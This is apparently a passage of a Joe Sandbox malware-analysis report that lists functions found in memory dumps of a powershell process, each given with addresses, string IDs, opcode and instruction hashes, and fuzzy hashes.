                                                                • API String ID: 0-1809644726
                                                                • Opcode ID: 42107889d322dbb7cfb9d7eb5c091654421b7ebdff337c0b86ecb31f494c393b
                                                                • Instruction ID: 8975ab09bb72632141b76639a691dcf361cf15ed92d8ba7622d1d978345cfc1d
                                                                • Opcode Fuzzy Hash: 42107889d322dbb7cfb9d7eb5c091654421b7ebdff337c0b86ecb31f494c393b
                                                                • Instruction Fuzzy Hash: 12028D74B102049FEB54DB58C851FAABBF2AF85314F11C4A9EA096F395CB32ED41CB91
                                                                Function 06EF74C0 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: x.>k$->k
                                                                • API String ID: 0-534732240
                                                                • Opcode ID: ebc44091aad8314eae8e8361623d43ed9233c26bc394dbfea15a8caf9328b6ec
                                                                • Instruction ID: 15f17146c6d1ced223c0c984920959cf7d06c81dc129d0c4f7e954eb28b0ae9f
                                                                • Opcode Fuzzy Hash: ebc44091aad8314eae8e8361623d43ed9233c26bc394dbfea15a8caf9328b6ec
                                                                • Instruction Fuzzy Hash: C9D18D34B102049FEB14EB68D465FAEBBB2AF85304F21C469D6056F395CB75E842CB91
                                                                Function 06EF74A2 Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: x.>k$->k
                                                                • API String ID: 0-534732240
                                                                • Opcode ID: 5accecc223622d1e05b6132689fe1faf2cfe9c3497617f300a4ef72b430948ab
                                                                • Instruction ID: f0c1edc6c1ee54fa425597b2a587125c045eb96b01c0c1c33a1cda9e2ee807ba
                                                                • Opcode Fuzzy Hash: 5accecc223622d1e05b6132689fe1faf2cfe9c3497617f300a4ef72b430948ab
                                                                • Instruction Fuzzy Hash: 2DB19930B203049FEB14DB68D451FAEBBB2EB89304F15D45AE6046F395CB35E842CB91
                                                                Function 0278EF70 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \V(m$\V(m
                                                                • API String ID: 0-451669857
                                                                • Opcode ID: 24772cd2124372c1ddb73325f64134ffb6b5f14c0ab4ee294c3c7c84388b7845
                                                                • Instruction ID: 373670a63b9289416f11a5aefbeaccea6ce91c0e7c79f6322db4c80e0b50c6f8
                                                                • Opcode Fuzzy Hash: 24772cd2124372c1ddb73325f64134ffb6b5f14c0ab4ee294c3c7c84388b7845
                                                                • Instruction Fuzzy Hash: 16717A71E40209CFDF10EFA9C8847AEFBF2AF88714F548129E415A7654EB349841CF92
                                                                Function 0278EF6A Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \V(m$\V(m
                                                                • API String ID: 0-451669857
                                                                • Opcode ID: 1c0123b0a98b9e636a595359485e85000075d7466c007afb67ee29f10c3067a1
                                                                • Instruction ID: b8ad7b07dcf12c77a86d6620a28293498308a696941366ddd5ca6b48a5f4f54e
                                                                • Opcode Fuzzy Hash: 1c0123b0a98b9e636a595359485e85000075d7466c007afb67ee29f10c3067a1
                                                                • Instruction Fuzzy Hash: D57169B0E40209DFDB10EFA9C8857EEFBF2AF88714F548129E415A7654EB349845CF92
                                                                Function 0278BAE8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: h](m$I(m
                                                                • API String ID: 0-264759010
                                                                • Opcode ID: 1d1be16c0d4ca1172d88ebbf25bb2d5e6ed63dd86d81140b154491fdd6b61c27
                                                                • Instruction ID: 0b23e56ac910d1679b4c8d85ec31df985fd3a4a2a45823fb9d68c03d6bb8077f
                                                                • Opcode Fuzzy Hash: 1d1be16c0d4ca1172d88ebbf25bb2d5e6ed63dd86d81140b154491fdd6b61c27
                                                                • Instruction Fuzzy Hash: 7F313B34A441288FCB26EB64C8547EEB7F2AF89309F1484E9D509AB351CB359E85CF81
                                                                Function 0278E91D Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \V(m
                                                                • API String ID: 0-2800782923
                                                                • Opcode ID: c4d98a1ba45f5cd028d8206c32a7c6318a48eaa9adca0684324714d866357992
                                                                • Instruction ID: d3d438a2564cf74165d57258dbf71c0d69a8d91e22cf6d50172f8088759b77d8
                                                                • Opcode Fuzzy Hash: c4d98a1ba45f5cd028d8206c32a7c6318a48eaa9adca0684324714d866357992
                                                                • Instruction Fuzzy Hash: 41B17B70E40259CFDB11DFA9C8857EEBBF2BF88714F148129E815A7294EB749845CF82
                                                                Function 06EF1501 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: h2@k
                                                                • API String ID: 0-3525363419
                                                                • Opcode ID: 9f8ff2ccaea54b2b1166772a87d72e017cf743f1e4278d0c9c3625e2372295d1
                                                                • Instruction ID: 8f7746ab0ad1a4bf9e01f25f045b855d85993357ffceb2ded705fac938557995
                                                                • Opcode Fuzzy Hash: 9f8ff2ccaea54b2b1166772a87d72e017cf743f1e4278d0c9c3625e2372295d1
                                                                • Instruction Fuzzy Hash: D951BE35B20308DFEB54CB54C440FAAB7A2EF85319F19C069EA059B381CA72ED42CB91
                                                                Function 06EF78E6 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: x.>k
                                                                • API String ID: 0-649699112
                                                                • Opcode ID: 4b86c22cbeaa3bb4ad9757ce3a006e83d335cf3dea49245f31291b7b083b7d26
                                                                • Instruction ID: be8692e668992c4b63b605226e3cfb9c3ed9ba0a23a0c1e9b8cc483d7217c08f
                                                                • Opcode Fuzzy Hash: 4b86c22cbeaa3bb4ad9757ce3a006e83d335cf3dea49245f31291b7b083b7d26
                                                                • Instruction Fuzzy Hash: 04318134B002149FE714AB64C865FBF77B39B85344F218429EA056F391CE76ED428B91
                                                                Function 06EF3990 Relevance: .7, Instructions: 691COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f77817aa7c42f12c1c4ebf81f179250d2c638fc3ae7d795365f32d063cacbc48
                                                                • Instruction ID: e5eb99d60aeb93a5bc21bc5c2cd02ab7d99c9f5a864c93ea63f3a9545c0b4b95
                                                                • Opcode Fuzzy Hash: f77817aa7c42f12c1c4ebf81f179250d2c638fc3ae7d795365f32d063cacbc48
                                                                • Instruction Fuzzy Hash: DE528B34B10204DFEB54CB98C451FAABBF2AF89318F14D169EA059B395CB72ED41CB91
                                                                Function 06EF3AB4 Relevance: .5, Instructions: 535COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 64f31b204b033f37ed8b2dc1a20a41cb8afc531524c6c1ca836fef528bce57a7
                                                                • Instruction ID: 05415e5d378c323c85b9c96b9be72d319a2a3769789ef5000db7c4fad5d60b00
                                                                • Opcode Fuzzy Hash: 64f31b204b033f37ed8b2dc1a20a41cb8afc531524c6c1ca836fef528bce57a7
                                                                • Instruction Fuzzy Hash: 85224974B11244EFEB44CB54C490FAABBB2BF88318F15D159E905AB392CB72ED41CB91
                                                                Function 027839D8 Relevance: .4, Instructions: 398COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a0a5993e875471d2f314a3a645e9d0b77ce58d23f2e9d9bce83ff306d15eabe
                                                                • Instruction ID: 36b55548a30a2cbe0539d55b203b8d1f479fa835f15c4d7bc62d052a1d43435b
                                                                • Opcode Fuzzy Hash: 8a0a5993e875471d2f314a3a645e9d0b77ce58d23f2e9d9bce83ff306d15eabe
                                                                • Instruction Fuzzy Hash: 96F11B74A01209DFDB15DF98D494A9EFBB2FF89710F24819AE809AB351D731ED81CB90
                                                                Function 06EF10F8 Relevance: .4, Instructions: 388COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 720a521d55580e323c4ce58b8a25d945d0aed4cfd93f7e23bef2ed9dc1b4bea3
                                                                • Instruction ID: ad57736ba899e55e1264895d200feb67a3fc2fb49fab6b6eb89a4a0b3a1cf1ad
                                                                • Opcode Fuzzy Hash: 720a521d55580e323c4ce58b8a25d945d0aed4cfd93f7e23bef2ed9dc1b4bea3
                                                                • Instruction Fuzzy Hash: 70F15E34F10208DFE754CB98C451EAAB7F2AF86314F25C159EA19AB345CB72ED42CB91
                                                                Function 06EF10D9 Relevance: .4, Instructions: 352COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6917f0a03c2a1d8b043da471fcde66b71d843c8bb3361d8843d9fe79fdf51a6c
                                                                • Instruction ID: a3efa3059e7c16cb41034c7e9c450e29e00216424928fe24f7aaa4589b3f72ba
                                                                • Opcode Fuzzy Hash: 6917f0a03c2a1d8b043da471fcde66b71d843c8bb3361d8843d9fe79fdf51a6c
                                                                • Instruction Fuzzy Hash: A0E14934F10208DFE754CF94C450EAABBB2AF85318F15C199E919AB391C772ED42CB91
                                                                Function 02788CC0 Relevance: .3, Instructions: 320COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 642d5ba31aefc475687924ace8499cf23ef68bc0279f7f379d10c55dc3facbe6
                                                                • Instruction ID: a6916d5d7a8647d52934b72d5ce9497f755096802ad14315ed05760473231ec1
                                                                • Opcode Fuzzy Hash: 642d5ba31aefc475687924ace8499cf23ef68bc0279f7f379d10c55dc3facbe6
                                                                • Instruction Fuzzy Hash: 52C1BE35A00208CFDB14EFA4D888AADBBB6FF85314F118159E506AF365CB34ED49CB91
                                                                Function 0278F1EE Relevance: .3, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0259f28e151443f1e712b922aa6fa5e0bb7d1b066291776f62e7cc3b28cf24af
                                                                • Instruction ID: 7a446caf1f22319a8360e88a940c3785b6830b5595522edc55e6ca6e2f5b5122
                                                                • Opcode Fuzzy Hash: 0259f28e151443f1e712b922aa6fa5e0bb7d1b066291776f62e7cc3b28cf24af
                                                                • Instruction Fuzzy Hash: 32B17C70E402198FDB10DFA9D8857DDBBF1BF88314F648129D815E7A94EB749885CF82
                                                                Function 02782B48 Relevance: .2, Instructions: 226COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a8d1a600c4a249f3bd436cb77b216e64b2fbca6c163c578e0442fabb95e27f9
                                                                • Instruction ID: 1d02eabe4afc822fc991385028a60f8c4d47125b537d0596f35dd8b1b8864189
                                                                • Opcode Fuzzy Hash: 3a8d1a600c4a249f3bd436cb77b216e64b2fbca6c163c578e0442fabb95e27f9
                                                                • Instruction Fuzzy Hash: 7C91BF70A00645DFCB05DF59C494AAEFBB1FF88310B24829AD915EB3A6D335EC41CBA0
                                                                Function 06EF407E Relevance: .2, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5148247b18f06bd0631dc2881c919571e9f6654cf8cf8ea6d5d618ba4dfef06d
                                                                • Instruction ID: a299c9ba96b5aacce22664a6d5e7617e79cd0f207fb53631d5ee0ad3fcbdd697
                                                                • Opcode Fuzzy Hash: 5148247b18f06bd0631dc2881c919571e9f6654cf8cf8ea6d5d618ba4dfef06d
                                                                • Instruction Fuzzy Hash: A2816634B11200DFEB94CF58C551FABB7E2AF88319F14D169EA059B392CB72E941CB91
                                                                Function 02788528 Relevance: .2, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6c7da726b156f2a6d1d121d0dc5a3d6254ef878317f315623c927a580416ba3
                                                                • Instruction ID: 9bbf96a10d17c2b8841bdae2063888b170492f36fab7fc038332bbdc86c74009
                                                                • Opcode Fuzzy Hash: d6c7da726b156f2a6d1d121d0dc5a3d6254ef878317f315623c927a580416ba3
                                                                • Instruction Fuzzy Hash: A6819D34A11248DFCB14EBB4D884AADBBF2FF89314F5484A9E405AB362CB35E945CB51
                                                                Function 02789488 Relevance: .2, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d5c8126f6782e1c5cb28da9007ebef872fb8c04bd1f1c18f97efa11dfcffcdf
                                                                • Instruction ID: 2f50cd3d20edef57b69e6e1595f387bf28a6eae693c26c983321fc15691ff5ba
                                                                • Opcode Fuzzy Hash: 0d5c8126f6782e1c5cb28da9007ebef872fb8c04bd1f1c18f97efa11dfcffcdf
                                                                • Instruction Fuzzy Hash: 5D71AF30A00219CFDB14EFA8D894AAEBBF6FF84314F248569D519DB751DB71AC42CB90
                                                                Function 027895F6 Relevance: .2, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52a05375e579fa72221cde5c30c72fdb3fc16f97086d1edfb2f9d803e1028332
                                                                • Instruction ID: 7a532909d71db5bed6987df6d812994bab9955da96d3db2dc742ccce3d910d04
                                                                • Opcode Fuzzy Hash: 52a05375e579fa72221cde5c30c72fdb3fc16f97086d1edfb2f9d803e1028332
                                                                • Instruction Fuzzy Hash: 01712870E00259DFDB14EFA5D890BADBBF6BF88314F148429D512AB3A0DB35AD45CB50
                                                                Function 06EF0860 Relevance: .2, Instructions: 179COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60ee3da6cff19eea44e8d65d6f5251ae70b5c645c573cb24ea9b762a9dd02e62
                                                                • Instruction ID: 7b59a7adf891e423ef4f732af6a4e088b4f47078977659422ff67fee20155ce5
                                                                • Opcode Fuzzy Hash: 60ee3da6cff19eea44e8d65d6f5251ae70b5c645c573cb24ea9b762a9dd02e62
                                                                • Instruction Fuzzy Hash: CA514A32B14354DFE7558B698820A67FBE6AFC2215B18807BD645DB246EE32CD01C3E1
                                                                Function 06EF9BC5 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 34ef60a403144942ceaf8bb572ea5bf64c719ff7ad4bec2961585ca8245655ba
                                                                • Instruction ID: dc1460d3d7888902b9aaa0f567ef1b18705da05a671d316844d7536bd7244b3e
                                                                • Opcode Fuzzy Hash: 34ef60a403144942ceaf8bb572ea5bf64c719ff7ad4bec2961585ca8245655ba
                                                                • Instruction Fuzzy Hash: 8941A332F103408FE754A7B88811FAEBBE69FD132871084ABD7819F346DA71D901C3A1
                                                                Function 06EF04C8 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc0ead596b8842a1482c2747e41b824f5dd7a7658a47162cd0fde0befb69bb15
                                                                • Instruction ID: 33a34bf7d2f2c6b60c6be37967ea71ca96ff01ea34b3b56eab36da486f3c0c01
                                                                • Opcode Fuzzy Hash: cc0ead596b8842a1482c2747e41b824f5dd7a7658a47162cd0fde0befb69bb15
                                                                • Instruction Fuzzy Hash: E7411632F10315CFEB649B7998206AAF7E5AFC4215B24812ADA09EB246DF71D901C7E1
                                                                Function 02789473 Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 27b6f1854af31d80fd61b268506540ef8f3b447fe68b3fa4f5250b3772209b64
                                                                • Instruction ID: d2dd8e295d98fc1bb9f85320092e6369a38faba6b2acfd9162217bea7ddf948e
                                                                • Opcode Fuzzy Hash: 27b6f1854af31d80fd61b268506540ef8f3b447fe68b3fa4f5250b3772209b64
                                                                • Instruction Fuzzy Hash: C7416B70E40219DFDB18EFA5C8547AEBBF6BF85314F148829D006AB791DB74AC45CB90
                                                                Function 02782C58 Relevance: .1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 69f0f9c4dc728113e84b43e25ce92f0bdaf39c0c26ee1191c3c9d1163249f88b
                                                                • Instruction ID: 999202dd49721af7b944b0bd9d0897d169dd2b4ae2c2322f7dadb4c433f902b8
                                                                • Opcode Fuzzy Hash: 69f0f9c4dc728113e84b43e25ce92f0bdaf39c0c26ee1191c3c9d1163249f88b
                                                                • Instruction Fuzzy Hash: D1414674A00245DFCB05CF9AC594EAAFBB1FF48314B11826AD901AB366D736FC51CBA0
                                                                Function 0278396D Relevance: .1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd78cbc4a3c0e8f8e3d66209072d9d1548da962f8776219e0859592f0fca78fd
                                                                • Instruction ID: a19addff0cedfef8f53bb598ad2056c7e290ade0f1a394ff72a0b8638ac7fd65
                                                                • Opcode Fuzzy Hash: bd78cbc4a3c0e8f8e3d66209072d9d1548da962f8776219e0859592f0fca78fd
                                                                • Instruction Fuzzy Hash: 2841D070A04645DFCB05DF6CD884AAABBB0FF4A310F15419AE848EB762C735EC52CB95
                                                                Function 06EF0A60 Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2b747ff7d5696d68053c3c85ce7b61dd532b6a3048a7e5ab8faf203c8e0ae649
                                                                • Instruction ID: dad3a7113e52ea2808a826704420de6b00f9344e1512eac888261ee0b6c0c67a
                                                                • Opcode Fuzzy Hash: 2b747ff7d5696d68053c3c85ce7b61dd532b6a3048a7e5ab8faf203c8e0ae649
                                                                • Instruction Fuzzy Hash: 58218E31B203059BE7649B794830B3BB7CA9BC4319F24842AA605CB2CADE71D940C3A1
                                                                Function 06EF0B90 Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b635a110e6ce8b0af66baeff38135176e1abd9a7a27839e5444f4f5118988ee
                                                                • Instruction ID: db8935c2191c6e011ef9483b95a373cd266a9a4399383cc23b09bdef146be165
                                                                • Opcode Fuzzy Hash: 1b635a110e6ce8b0af66baeff38135176e1abd9a7a27839e5444f4f5118988ee
                                                                • Instruction Fuzzy Hash: CC2149327203059BF7B4976A4830B37B79A9BC1359F24842A9709DF287DD35D840C372
                                                                Function 06EF0845 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0326215784cfaf9f8af1516c5b06a3a39f14042713f5eea100f983c1a78dac7e
                                                                • Instruction ID: a0fbcd4701465d5c259b1d67ab8a256e086c33e06397299d441a0cc4fdd999d5
                                                                • Opcode Fuzzy Hash: 0326215784cfaf9f8af1516c5b06a3a39f14042713f5eea100f983c1a78dac7e
                                                                • Instruction Fuzzy Hash: E0212531F15340EFEB51CB558861BA6FBB6AF81250F1890AAE6449B293DB31DA01C7E1
                                                                Function 06EF0B75 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 990e3225316ab64cf7bb80eb19d2e1eb5f4140c24ca99a47e4635d1c1bc89e87
                                                                • Instruction ID: 922b2123efaf1aa7f722caa8db50415ada796f4adf819aaceddbe5fb40537941
                                                                • Opcode Fuzzy Hash: 990e3225316ab64cf7bb80eb19d2e1eb5f4140c24ca99a47e4635d1c1bc89e87
                                                                • Instruction Fuzzy Hash: C7215B25B243815FFB604B364C30B733BA54BC2659F189466EA44DF2CBD929D944C372
                                                                Function 06EF0A4C Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67ce7a8f5e8b4c55ddd5df1ad98b8b143ae259cad0101dfcee68db96ca9172d4
                                                                • Instruction ID: 9641254f3632fd11685f6865f648bd689c143d5f1f48c3f4cb8db48aa9120774
                                                                • Opcode Fuzzy Hash: 67ce7a8f5e8b4c55ddd5df1ad98b8b143ae259cad0101dfcee68db96ca9172d4
                                                                • Instruction Fuzzy Hash: 6521AD31B14344ABEB604B764830B7777D94F81318F144466A640DB2CBDA68ED40C372
